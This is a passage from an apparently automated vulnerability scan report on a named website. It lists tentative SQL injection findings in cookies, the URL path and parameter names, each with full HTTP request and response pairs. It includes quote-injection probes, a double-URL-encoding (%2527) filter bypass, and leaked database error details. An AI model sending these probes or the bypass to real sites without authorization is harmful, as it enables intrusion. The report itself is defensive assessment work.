Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:13:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:13:14 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:13:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22387


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<div>However, the documentation (at the time of writing this) fails to call out a common issue that I've seen coming up for a number of Urchin users: <strong>
...[SNIP]...

Request 2

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:13:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Length: 76
Connection: close
Content-Type: text/html

Database Error: Unable to connect to the database:Could not connect to MySQL

1.64. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/87-visitor-scoring-with-urchin.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:11:48 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:11:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23268


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.65. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html [optimizelyEndUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/87-visitor-scoring-with-urchin.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/87-visitor-scoring-with-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.66. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/88-urchin-vs-google-analytics.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 07:28:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 07:28:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:28:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.67. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/88-urchin-vs-google-analytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/88-urchin-vs-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:06:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/88-urchin-vs-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:06:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=40a1140278fbef8b07f02061e9721c9c; path=/
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.68. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/88-urchin-vs-google-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment&1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/88-urchin-vs-google-analytics.html?itemid=70#comment&1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:25:57 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:25:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.69. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/94-exclude-bots-in-urchin.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/94-exclude-bots-in-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:10 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/94-exclude-bots-in-urchin.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:15 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:09:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.70. http://www.analyticspros.com/blog/googleanalytics.feed [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.feed

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
